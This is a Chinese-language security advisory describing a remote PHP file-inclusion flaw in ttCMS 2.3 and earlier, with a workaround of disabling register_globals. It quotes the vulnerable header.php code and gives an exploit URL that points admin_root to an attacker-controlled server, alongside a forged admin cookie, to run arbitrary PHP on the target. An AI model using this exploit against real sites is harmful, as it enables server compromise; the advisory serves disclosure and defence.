涉及程序: ttCMS 2.3版及其之前的版本 描述: ttCMS 存在远程代码执行缺陷 详细: ttCMS 的admin/templates/目录下包含的“header.php”文件存在缺陷: (Line #002) if ($HTTP_COOKIE_VARS<\"ttcms_user_admin\"> > 0) { (Line #003) include_once(\"$admin_root/templates/header.inc.php\"); (Line #004) } else { (Line #005) header(\"Location: $admin_root_url/login.php\"); (Line #006) exit; (Line #007) } 攻击者首先在WEB服务器上精心创建包含恶意PHP代码的“templates/header.inc.php”文件,并伪造的包含下列内容的cookie: ttcms_user_admin=1 通过向目标服务器发送精心构造的下列格式的URL,攻击者能在目标机器上注入并执行任意PHP代码: http://target/admin/templates/header.php?admin_root=http://yourserver/ 攻击方法: 示例代码: http://target/admin/templates/header.php?admin_root=http://yourserver/ 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.ttcms.com/ 临时解决方案: 在php.ini文件中,使register_globals失效。